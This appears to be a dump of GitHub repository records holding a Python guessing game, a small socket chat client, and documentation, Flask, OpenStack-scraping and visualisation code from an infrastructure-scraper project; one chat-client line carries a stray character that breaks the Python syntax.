Assign a unique city to each grid vertex\n- From collected cities, draw $n$ sample uniformly, at random, without replacement. \n\nThe city to grid assignment was performed by [citipy](https://github.com/wingchen/citipy.git) module.\n\n## Report\nThe visual report containing the discovered insights and the detailed implementation are available by a Jupyter Noebook [here](https://github.com/aidinhass/weatherpy/blob/master/notebooks/README.md).\n\n## Requirements\n- python=3.6.5\n- jupyter=1.0.0\n- nb_conda=2.2.1\n- numpy=1.14.2\n- matplotlib=2.2.2\n- pandas=0.22.0\n- scipy=1.1.0\n- basemap=1.1.0\n- citipy=0.0.1\n\n## Directory Structure\nThis repo contains three directories: 'fig', 'img' and 'log':\n\n```bash\n|__ images <- Images for README.md files.\n├── notebooks <- Ipython notebook files.\n├── reports <- Generated analysis as HTML, PDF, LaTeX, etc.\n│   ├── figures <- Generated graphics and figures to be used in reporting\n│   └── logs <- Generated log files\n└── src <- Source code for use in this project.\n```\n\n### Installation\nInstall python dependencies from `requirements.txt` using conda.\n```bash\nconda install --yes --file requirements.txt\n```\n\nOr create a new conda environment `<new-env-name>` by importing a copy of a working conda environment stored at root directory :`weatherpy.yml`.\n```bash\nconda env create --name <new-env-name> -f \"weatherpy.yml\"\n```\n\n## References\n- [OpenWeatherMap Current Weather API](https://openweathermap.org/current)\n- [citipy](https://github.com/wingchen/citipy.git)\n\n## To Do\n- [ ] Add geomap analyses\n\n## License\nNA\n\n" } ]
3
ededd9/GuessingGame
https://github.com/ededd9/GuessingGame
df06c84fa9d26736be4e5546d0c50b8d165cc319
a323f397f58930911510dfb53ec142f1e0d99c70
87511a84d0cc5206239af107b7bebb9a1b364ba3
refs/heads/master
2020-09-15T09:32:22.423228
2019-11-21T14:14:25
2019-11-21T14:14:25
223,411,434
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.568854570388794, "alphanum_fraction": 0.5855855941772461, "avg_line_length": 26.785715103149414, "blob_id": "34bb5ad8d58dc526d67eaaee743dafceca6cc602", "content_id": "6157f8fecae66cde4236b05b22412b858b506fa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 815, "license_type": "no_license", "max_line_length": 95, "num_lines": 28, "path": "/GuessingGame.py", "repo_name": "ededd9/GuessingGame", "src_encoding": "UTF-8", "text": "import random\nprint (\"Hi, this is a simple Guessing Game ¯\\_(ツ)_/¯ . Please guess a number betwee 0 and 10!\")\nrandomint = random.randint(0,10)\ntries = 0\n\nwhile tries < 3:\n userinput = int(input())\n \n if userinput == randomint:\n tries+=1\n break\n \n elif userinput > randomint:\n print (\"Try a smaller number ( ͡° ͜ʖ ͡°) !\")\n tries+=1\n if tries == 3:\n break\n elif userinput < randomint:\n print (\"Try a bigger number ( ‾ ʖ̫ ‾) !\")\n tries+=1\n if tries == 3:\n break\n \nif userinput == randomint:\n print ('Good job! It took you ' + str(tries) + ' tries (ᴗ ͜ʖ ᴗ) !')\nif userinput != randomint:\n print ('Wow, you suck. You failed about umm.. ' + str(tries) + ' times (╯ ͠° ͟ʖ ͡°)╯┻━┻')\nprint ('This was the correct number: ' + str(randomint))" } ]
1
NeziY/Server-Client-Messaging
https://github.com/NeziY/Server-Client-Messaging
f02096f8da6c6347d9187275aebd8ffdd603e989
049a43dc6b959ace6ba8bcc293931df9df4c2eff
17b1cbc1243b76548783c2c92ab0d71a6fecf99e
refs/heads/master
2021-01-10T15:52:42.298257
2016-02-05T15:04:38
2016-02-05T15:04:38
51,153,039
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 25, "blob_id": "90a20038fed5a939a6be094cd4036517dcc75312", "content_id": "969bab17e2e26894679cec180592c0cd237c4432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/README.md", "repo_name": "NeziY/Server-Client-Messaging", "src_encoding": "UTF-8", "text": "# Server-Client-Messaging" }, { "alpha_fraction": 0.5142095685005188, "alphanum_fraction": 0.5355239510536194, "avg_line_length": 17.766666412353516, "blob_id": "7daef017b6818b2e9920755321fbc34afdd2748a", "content_id": "c3ba04e0a5237d57b0a8239eee9a5dff1cada48d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1127, "license_type": "no_license", "max_line_length": 49, "num_lines": 60, "path": "/Client.py", "repo_name": "NeziY/Server-Client-Messaging", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport threading\nfrom queue import Queue\n\nNUMBER_OF_THREADS = 2\nJOB_NUMBER =æ [1, 2]\nqueue = Queue()\n\n\ndef socket_create():\n global host\n global port\n global s\n host = '192.168.1.41'\n port = 2020\n s = socket.socket()\n s.connect((host, port))\n\ndef listen_for_msg():\n while True:\n data = s.recv(1024)\n data_str = str(data[:].decode(\"utf-8\"))\n if data_str != \" \":\n print(data_str)\n\ndef send_msg():\n while True:\n sent_msg = input()\n if sent_msg != \" \":\n s.send(str.encode(sent_msg, \"utf-8\"))\n elif sent_msg == \"quit\":\n s.close()\n\ndef create_worker():\n for _ in range(NUMBER_OF_THREADS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\ndef work():\n while True:\n x = queue.get()\n if x == 1:\n listen_for_msg()\n if x == 2:\n send_msg()\n queue.task_done()\n\n\n# Each list item is a new job\n\ndef create_jobs():\n for x in JOB_NUMBER:\n queue.put(x)\n queue.join()\n\nsocket_create()\ncreate_worker()\ncreate_jobs()\n" } ]
2
slimakcz/infra-scraper
https://github.com/slimakcz/infra-scraper
69b168df0be428372610b904c3e41cfd51d7d514
9329ccc7fa68744007b46a2e16d2e833db266208
d50097fb3d7ed0e6b52f6b41e5f196310de7844c
refs/heads/master
2021-05-14T15:40:15.066936
2017-12-24T11:50:24
2017-12-24T11:50:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6302521228790283, "alphanum_fraction": 0.6344537734985352, "avg_line_length": 25.33333396911621, "blob_id": "6d0e9244a7c9f03d90a450891320f247f3a65dce", "content_id": "bfc1a2da2bdc258106ef136b03d9449971f97ad5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 238, "license_type": "permissive", "max_line_length": 71, "num_lines": 9, "path": "/doc/source/text/input-amazon.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nAmazon Web Services\n===================\n\nAWS scraping uses ``boto3`` high level AWS python SDK for accessing and\nmanipulating AWS resources.\n\n.. literalinclude:: ../static/config/config-amazon.yaml\n :language: yaml\n" }, { "alpha_fraction": 0.6253541111946106, "alphanum_fraction": 0.6260623335838318, "avg_line_length": 24.196428298950195, "blob_id": "8294859aedd3a378bdf9f7f1a2ef86b6abf5bbfb", "content_id": "db16282e1fd425d7755222884daebd7288220958", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 65, "num_lines": 56, "path": "/infra_scraper/server.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom flask import Flask, redirect, render_template, jsonify\nfrom collections import OrderedDict\nfrom .main import InfraScraper\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\napp = Flask(__name__, static_folder='./assets/static')\n\n\[email protected]('/')\ndef index():\n scraper = InfraScraper()\n config = scraper.status()\n# endpoints = config['endpoints'].copy()\n# config['endpoints'] = OrderedDict(\n# reversed(sorted(endpoints.items(), key=lambda x: x[1])))\n return render_template('index.html',\n config=config)\n\n\[email protected]('/layout/<name>/<layout>')\ndef topology_layout(name, layout):\n scraper = InfraScraper()\n config = scraper.get_config(name)\n return render_template('layout.html',\n name=name,\n config=config,\n layout=layout)\n\n\[email protected]('/api/<name>/scrape')\ndef scrape_data(name=None):\n scraper = InfraScraper()\n scraper.scrape_data(name)\n return redirect('.')\n\n\[email protected]('/api/<name>')\ndef topology_data(name=None):\n scraper = InfraScraper()\n data = scraper.get_cached_data(name, 'vis')\n return jsonify(data)\n\n\[email protected]('/api/<name>/hier')\ndef hierarchy_topology_data(name=None):\n scraper = InfraScraper()\n data = scraper.get_cached_data(name, 'vis-hier')\n return jsonify(data)\n\n\ndef run(*args, **kwargs):\n app.run(*args, **kwargs)\n" }, { "alpha_fraction": 0.723770022392273, "alphanum_fraction": 0.7599288821220398, "avg_line_length": 41.17499923706055, "blob_id": "7ff899cc6c0a164868e66761a239d5ba68fce85e", "content_id": "e7a3cbb417d15766ab95548bbf3e6606c26d8bb3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1693, "license_type": "permissive", "max_line_length": 95, "num_lines": 40, "path": "/doc/source/text/layout-force.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n====================\nForce-Directed Graph\n====================\n\n`Force-directed graph` drawing algorithms are used for drawing graphs in an\naesthetically pleasing way. Their purpose is to position the nodes of a graph\nin two-dimensional or three-dimensional space so that all the edges are of\nmore or less equal length and there are as few crossing edges as possible, by\nassigning forces among the set of edges and the set of nodes, based on their\nrelative positions, and then using these forces either to simulate the motion\nof the edges and nodes or to minimize their energy.\n\nWhile graph drawing can be a difficult problem, force-directed algorithms,\nbeing physical simulations, usually require no special knowledge about graph\ntheory such as planarity.\n\nGood-quality results can be achieved for graphs of medium size (up to 50–500\nvertices), the results obtained have usually very good results based on the\nfollowing criteria: uniform edge length, uniform vertex distribution and\nshowing symmetry. This last criterion is among the most important ones and is\nhard to achieve with any other type of algorithm.\n\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/force-directed-plot.png\n :width: 600px\n :figclass: align-center\n\n Force-directed plot of all OpenStack resources (cca 3000 nodes)\n\n\nMore Information\n================\n\n* https://en.wikipedia.org/wiki/Force-directed_graph_drawing\n* https://bl.ocks.org/shimizu/e6209de87cdddde38dadbb746feaf3a3 (shimizu’s D3 v4 - force layout)\n* https://bl.ocks.org/mbostock/3750558 (Mike Bostock’s Sticky Force Layout)\n* https://bl.ocks.org/emeeks/302096884d5fbc1817062492605b50dd (D3v4 Constraint-Based Layout)" }, { "alpha_fraction": 0.647773265838623, "alphanum_fraction": 0.647773265838623, "avg_line_length": 21.409090042114258, "blob_id": "ded15786ac286c7365f130eadbafa64db941ad54", "content_id": "5d0a1d2927765ab58a611cb3b283b67309b36617", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "permissive", "max_line_length": 49, "num_lines": 22, "path": "/infra_scraper/storage/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseStorage(object):\n\n def __init__(self, **kwargs):\n self.name = kwargs.get('name')\n self.last_timestamp = None\n\n def save_data(self, name, data):\n raise NotImplementedError\n\n def load_data(self, name):\n raise NotImplementedError\n\n def save_output_data(self, name, kind, data):\n raise NotImplementedError\n\n def load_output_data(self, name, kind):\n raise NotImplementedError\n" }, { "alpha_fraction": 0.6812297701835632, "alphanum_fraction": 0.6812297701835632, "avg_line_length": 15.210526466369629, "blob_id": "56f327b1e87d159d873def8b1cadd580cc9c1b30", "content_id": "f2079ab4c72fa8aa21e5745d30dc4817cae86d6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 618, "license_type": "permissive", "max_line_length": 75, "num_lines": 38, "path": "/doc/source/text/app-usage.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=====\nUsage\n=====\n\nThe application comes with several entry commands:\n\n\nScraping Commands\n=================\n\n**scraper_get <endpoint-name>**\n\n Scrape single endpoint once.\n\n**scraper_get_forever <endpoint-name>**\n\n Scrape single endpoint continuously.\n\n**scraper_get_all**\n\n Scrape all defined endpoints once.\n\n**scraper_get_all_forever**\n\n Scrape all defined endpoints continuously.\n\n\nUI and Utility Commands\n=======================\n\n**scraper_status**\n\n Display the service status, endpoints, scrapes, etc.\n\n**scraper_web**\n\n Start the UI with visualization samples and API that provides the scraped\n data.\n\n" }, { "alpha_fraction": 0.7067039012908936, "alphanum_fraction": 0.7067039012908936, "avg_line_length": 34.70000076293945, "blob_id": "ab983802ee737657ab92f0ccee477a256e07f2f1", "content_id": "6fe2d7fcdf523d2180d09071abcc758d1b827969", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 358, "license_type": "permissive", "max_line_length": 78, "num_lines": 10, "path": "/doc/source/text/input-kubernetes.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nKubernetes Clusters\n===================\n\nKubernetes requires some information from ``kubeconfig`` file. You provide the\nparameters of the cluster and the user to the scraper. These can be found\nunder corresponding keys in the kubernetes configuration file.\n\n.. literalinclude:: ../static/config/config-kubernetes.yaml\n :language: yaml\n" }, { "alpha_fraction": 0.4912891983985901, "alphanum_fraction": 0.4947735071182251, "avg_line_length": 14.052631378173828, "blob_id": "a064dbd88d46033e099e340660e3c77369e3e6ec", "content_id": "1c8e25c6fca66fb6c9d68aff1990def91d30a7d0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 287, "license_type": "permissive", "max_line_length": 26, "num_lines": 19, "path": "/doc/source/index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n==========================\nInfraScraper Documentation\n==========================\n\n.. toctree::\n :maxdepth: 3\n :glob:\n\n text/app-index.rst\n text/input-index.rst\n text/layout-index.rst\n\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5056818127632141, "avg_line_length": 13.583333015441895, "blob_id": "0d101fd88937aeddc6d681a75f33b65248e3aff2", "content_id": "f2f1492e27df6fe5c56b8cad5265e220b1a1774d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 176, "license_type": "permissive", "max_line_length": 25, "num_lines": 12, "path": "/doc/source/text/app-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n====================\nApplication Overview\n====================\n\n.. toctree::\n :maxdepth: 2\n\n app-install.rst\n app-config.rst\n app-usage.rst\n\n.. app-architecture.rst\n" }, { "alpha_fraction": 0.6042780876159668, "alphanum_fraction": 0.6106951832771301, "avg_line_length": 24.256755828857422, "blob_id": "a343215320c0688e9a0d433a07fa18f0a599c9de", "content_id": "57975187c3c0bc98bd631e43fa5c42b2971a3eec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1870, "license_type": "permissive", "max_line_length": 79, "num_lines": 74, "path": "/infra_scraper/utils.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport os\nimport re\nimport json\nimport yaml\nimport logging\n\n_schema_dir = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'schema')\n\n\ndef setup_logger(name):\n msg_format = '%(asctime)s [%(levelname)s] [%(module)s] %(message)s'\n formatter = logging.Formatter(fmt=msg_format)\n\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n return logger\n\n\ndef load_yaml_json_file(path):\n if os.path.exists(path):\n with open(path, 'r') as f:\n if path.endswith('json'):\n return json.load(f)\n else:\n return yaml.safe_load(f)\n return {}\n\n\ndef get_graph_schema(name):\n schema_file = os.path.join(_schema_dir, 'resource', '{}.yaml'.format(name))\n return load_yaml_json_file(schema_file)\n\n\ndef get_node_icon(icon):\n family, character = icon.split(\":\")\n output = ICON_MAPPING['character'][family][character].copy()\n output[\"family\"] = ICON_MAPPING['family'][family]\n output['name'] = character\n output[\"char\"] = int(\"0x{}\".format(output[\"char\"]), 0)\n return output\n\n\ndef to_camel_case(snake_str, first=True):\n components = snake_str.split('_')\n if first:\n return \"\".join(x.title() for x in components)\n else:\n return components[0] + \"\".join(x.title() for x in components[1:])\n\n\ndef to_snake_case(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\nclass ClassRegistry:\n\n def __init__(self):\n self._classes = {}\n\n def add(self, cls):\n self._classes[cls.__name__] = cls\n\n def get_type(self, name):\n return self._classes.get(name)\n\n\nicon_file = os.path.join(_schema_dir, 'icon.yaml')\nICON_MAPPING = load_yaml_json_file(icon_file)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 48.5, "blob_id": "dc7340350ef8f40c4d8ed8e7e0dad173a0e3f9cd", "content_id": "29c8392bf6a6cea8e15bfde133399ca20374cbc2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "permissive", "max_line_length": 58, "num_lines": 2, "path": "/infra_scraper/exceptions.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nclass InfraScraperException(Exception):\n \"\"\"Something went wrong with parsing infra scraper.\"\"\"\n" }, { "alpha_fraction": 0.5345703959465027, "alphanum_fraction": 0.5350544452667236, "avg_line_length": 41.30375289916992, "blob_id": "77a8690010c8a05cc0055e21e426b37de10f0bd1", "content_id": "2012961695061c7ff628fd53cfaaf16585674571", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12395, "license_type": "permissive", "max_line_length": 88, "num_lines": 293, "path": "/infra_scraper/input/openstack.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport yaml\nimport tempfile\nimport os_client_config\nfrom os_client_config import cloud_config\nfrom heatclient.exc import HTTPBadRequest\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.openstack')\n\n\nclass OpenStackInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'openstack'\n self.scope = kwargs.get('scope', 'local')\n super(OpenStackInput, self).__init__(**kwargs)\n config_file, filename = tempfile.mkstemp()\n config_content = {\n 'clouds': {self.name: self.config}\n }\n os.write(config_file, yaml.safe_dump(config_content).encode())\n os.close(config_file)\n self.cloud = os_client_config.config \\\n .OpenStackConfig(config_files=[filename]) \\\n .get_one_cloud(cloud=self.name)\n os.remove(filename)\n self.identity_api = self._get_client('identity')\n self.compute_api = self._get_client('compute')\n self.network_api = self._get_client('network')\n self.orch_api = self._get_client('orchestration')\n self.image_api = self._get_client('image')\n self.volume_api = self._get_client('volume')\n\n def _get_client(self, service_key):\n constructor = cloud_config._get_client(service_key)\n return self.cloud.get_legacy_client(service_key, constructor)\n\n def scrape_all_resources(self):\n if self.scope == 'global':\n self.scrape_keystone_projects()\n# self.scrape_keystone_users()\n self.scrape_cinder_volumes()\n self.scrape_glance_images()\n if self.scope == 'global':\n self.scrape_nova_aggregates()\n self.scrape_nova_hypervisors()\n self.scrape_nova_keypairs()\n self.scrape_nova_flavors()\n self.scrape_nova_servers()\n# self.scrape_nova_security_groups()\n self.scrape_neutron_networks()\n self.scrape_neutron_subnets()\n self.scrape_neutron_floating_ips()\n self.scrape_neutron_routers()\n self.scrape_neutron_ports()\n self.scrape_heat_stacks()\n # self.scrape_heat_resource_types()\n\n def _create_relations(self):\n # Define relationships between project and all namespaced resources.\n for resource_type, resource_dict in self.resources.items():\n for resource_id, resource in resource_dict.items():\n if 'tenant_id' in resource['metadata']:\n self._scrape_relation(\n 'in_os_project',\n resource_id,\n resource['metadata']['tenant_id'])\n elif 'project' in resource['metadata']:\n self._scrape_relation(\n 'in_os_project',\n resource_id,\n resource['metadata']['project'])\n\n for resource_id, resource in self.resources.get('os_stack', {}).items():\n for ext_res in resource['metadata']['resources']:\n if ext_res['resource_type'] in self._get_resource_mapping():\n self._scrape_relation(\n 'os_stack-{}'.format(\n self._get_resource_mapping()[ext_res['resource_type']]),\n resource_id,\n ext_res['physical_resource_id'])\n\n # Define relationships between aggregate zone and all hypervisors.\n for resource_id, resource in self.resources.get('os_aggregate', {}).items():\n for host in resource['metadata']['hosts']:\n self._scrape_relation(\n 'in_os_aggregate',\n host,\n resource_id)\n\n for resource_id, resource in self.resources.get('os_floating_ip', {}).items():\n if resource['metadata'].get('port_id', None) is not None:\n self._scrape_relation(\n 'use_os_port',\n resource_id,\n resource['metadata']['port_id'])\n\n for resource_id, resource in self.resources.get('os_port', {}).items():\n self._scrape_relation(\n 'in_os_net',\n resource_id,\n resource['metadata']['network_id'])\n if resource['metadata']['device_id'] is not None:\n self._scrape_relation(\n 'use_os_port',\n resource['metadata']['device_id'],\n resource_id)\n if self.scope == 'global':\n if resource['metadata'].get('binding:host_id', False):\n self._scrape_relation(\n 'on_os_hypervisor',\n resource_id,\n resource['metadata']['binding:host_id'])\n\n for resource_id, resource in self.resources.get('os_server', {}).items():\n if self.scope == 'global':\n self._scrape_relation(\n 'on_os_hypervisor',\n resource_id,\n resource['metadata']['OS-EXT-SRV-ATTR:host'])\n\n self._scrape_relation(\n 'use_os_flavor',\n resource_id,\n resource['metadata']['flavor']['id'])\n\n if resource['metadata']['image'] != '':\n if resource['metadata']['image'].get('id', None) is not None:\n self._scrape_relation(\n 'use_os_image',\n resource_id,\n resource['metadata']['image']['id'])\n\n if resource['metadata']['keypair_name'] != '':\n self._scrape_relation(\n 'use_os_key_pair',\n resource_id,\n resource['metadata']['keypair_name'])\n\n for resource_id, resource in self.resources.get('os_subnet', {}).items():\n self._scrape_relation(\n 'in_os_net',\n resource_id,\n resource['metadata']['network_id'])\n\n def scrape_keystone_users(self):\n users = self.identity_api.get('/users')\n for user in users:\n resource = user.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_user', None, metadata=resource)\n\n def scrape_keystone_projects(self):\n projects = self.identity_api.tenants.list()\n for project in projects:\n resource = project.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_project', None, metadata=resource)\n\n def scrape_nova_aggregates(self):\n response = self.compute_api.aggregates.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['name'], resource['name'],\n 'os_aggregate', None, metadata=resource)\n\n def scrape_nova_keypairs(self):\n response = self.compute_api.keypairs.list()\n for item in response:\n resource = item.to_dict()['keypair']\n self._scrape_resource(resource['name'],\n resource['name'],\n 'os_key_pair', None, metadata=resource)\n\n def scrape_nova_flavors(self):\n response = self.compute_api.flavors.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'],\n resource['name'],\n 'os_flavor', None, metadata=resource)\n\n def scrape_nova_hypervisors(self):\n response = self.compute_api.hypervisors.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['service']['host'],\n resource['hypervisor_hostname'],\n 'os_hypervisor', None, metadata=resource)\n\n def scrape_nova_servers(self):\n if self.scope == 'global':\n search_opts = {'all_tenants': 1}\n else:\n search_opts = None\n response = self.compute_api.servers.list(\n search_opts=search_opts)\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_server', None, metadata=resource)\n\n def scrape_nova_security_groups(self):\n response = self.compute_api.security_groups.list(\n search_opts={'all_tenants': 1})\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_security_group', None, metadata=resource)\n\n def scrape_cinder_volumes(self):\n response = self.volume_api.volumes.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_volume', None, metadata=resource)\n\n def scrape_glance_images(self):\n response = self.image_api.images.list()\n for item in response:\n resource = item.__dict__['__original__']\n self._scrape_resource(resource['id'], resource['name'],\n 'os_image', None, metadata=resource)\n\n def scrape_neutron_routers(self):\n resources = self.network_api.list_routers().get('routers')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_router', None, metadata=resource)\n\n def scrape_neutron_floating_ips(self):\n resources = self.network_api.list_floatingips().get('floatingips')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_floating_ip', None, metadata=resource)\n\n def scrape_neutron_floating_ip_associations(self):\n resources = self.network_api.list_floatingips().get('floatingips')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_floating_ip_association', None, metadata=resource)\n\n def scrape_neutron_networks(self):\n resources = self.network_api.list_networks().get('networks')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_net', None, metadata=resource)\n\n def scrape_neutron_subnets(self):\n resources = self.network_api.list_subnets().get('subnets')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_subnet', None, metadata=resource)\n\n def scrape_neutron_ports(self):\n resources = self.network_api.list_ports().get('ports')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_port', None, metadata=resource)\n\n # heat resources\n\n def scrape_heat_resource_types(self):\n resource_types = self.orch_api.resource_types.list(\n search_opts={'all_tenants': 1})\n for resource_type in resource_types:\n resource = resource_type.to_dict()\n self._scrape_resource(resource, resource,\n 'os_resource_type', None, metadata=resource)\n\n def scrape_heat_stacks(self):\n if self.scope == 'global':\n search_opts = {'all_tenants': 1}\n else:\n search_opts = None\n stacks = self.orch_api.stacks.list(\n search_opts=search_opts)\n for stack in stacks:\n resource = stack.to_dict()\n resource['resources'] = []\n try:\n resources = self.orch_api.resources.list(stack.id,\n nested_depth=2)\n for stack_resource in resources:\n resource['resources'].append(stack_resource.to_dict())\n except HTTPBadRequest as exception:\n logger.error(exception)\n self._scrape_resource(resource['id'], resource['stack_name'],\n 'os_stack', None, metadata=resource)\n" }, { "alpha_fraction": 0.7415637969970703, "alphanum_fraction": 0.7646090388298035, "avg_line_length": 36.96875, "blob_id": "fcf346c03ce6938dd787ce525b32fc015b4b7d79", "content_id": "17807f320fba92aaaf00045f49a0c6b540306db1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 107, "num_lines": 32, "path": "/doc/source/text/layout-matrix.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n================\nAdjacency Matrix\n================\n\nAn adjacency matrix is a square matrix used to represent a finite graph. The\nelements of the matrix indicate whether pairs of vertices are adjacent or not\nin the graph.\n\nIn the special case of a finite simple graph, the adjacency matrix is a\n(0,1)-matrix with zeros on its diagonal. If the graph is undirected, the\nadjacency matrix is symmetric. The relationship between a graph and the\neigenvalues and eigenvectors of its adjacency matrix is studied in spectral\ngraph theory.\n\nThe adjacency matrix should be distinguished from the incidence matrix for a\ngraph, a different matrix representation whose elements indicate whether\nvertex–edge pairs are incident or not, and degree matrix which contains\ninformation about the degree of each vertex.\n\n.. figure:: ../static/img/adjacency-matrix.png\n :width: 100%\n :figclass: align-center\n\n Adjacency matrix of OpenStack project's resources (cca 100 nodes)\n\n\nMore Information\n================\n\n* https://github.com/micahstubbs/d3-adjacency-matrix-layout\n* https://bl.ocks.org/micahstubbs/7f360cc66abfa28b400b96bc75b8984e (Micah Stubbs’s adjacency matrix layout)\n* https://en.wikipedia.org/wiki/Adjacency_matrix" }, { "alpha_fraction": 0.7081966996192932, "alphanum_fraction": 0.7098360657691956, "avg_line_length": 28, "blob_id": "1a5314cbe7c5b7ede52c321f4b74f4a2ed135b35", "content_id": "206cd4b36a32cda711031b77d641abbd5b65fc1c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "permissive", "max_line_length": 85, "num_lines": 21, "path": "/infra_scraper/tests/test_main.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport pytest\nimport json\nimport os\n\nfrom infra_scraper.main import _get_module\n\nmodules_file = os.path.join(\n os.path.dirname(os.path.realpath('{}/..'.format(__file__))), 'constructors.json')\n\nwith open(modules_file) as fileneco:\n modules_dict = json.loads(fileneco.read())\n\nmodules_list = []\n\nfor module_label, module_class in modules_dict.items():\n modules_list.append((module_label, module_class))\n\n\[email protected](\"test_input,expected_class\", modules_list)\ndef test_load_module(test_input, expected_class):\n assert _get_module(test_input).__name__ == expected_class.split('.')[-1]\n" }, { "alpha_fraction": 0.5156431198120117, "alphanum_fraction": 0.5215527415275574, "avg_line_length": 34.224491119384766, "blob_id": "22ce2b86febc28c3bde7cd67f5df3df217f83d36", "content_id": "6d1a6cb1958e17b40482a2aa5edcd76000a604f8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8630, "license_type": "permissive", "max_line_length": 106, "num_lines": 245, "path": "/infra_scraper/assets/static/js/d3.plot.hive.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nvar HivePlot = {\n init: function(container, data, config) {\n config = config || {};\n if (!data) {\n throw new Error(\"Cannot initialize Hive plot, invalid data provided: \" + data);\n }\n var width = config.width || \"auto\",\n height = config.height || \"auto\",\n radius = config.radius || \"auto\",\n selector = config.selector,\n axisMapping = {},\n radiusMapping = {},\n itemCounters = {},\n itemStep = {},\n getNodeCode = function(node){\n //TODO: entities can have code\n return node.name.replace(/[\\s\\.]/g,\"_\");\n };\n\n relationalPlotHelpers.displayResources(Object.keys(data.resources).length);\n relationalPlotHelpers.displayRelations(data.relations.length);\n relationalPlotHelpers.displayScrapeTime(data.date);\n\n\n function render(){\n var container = 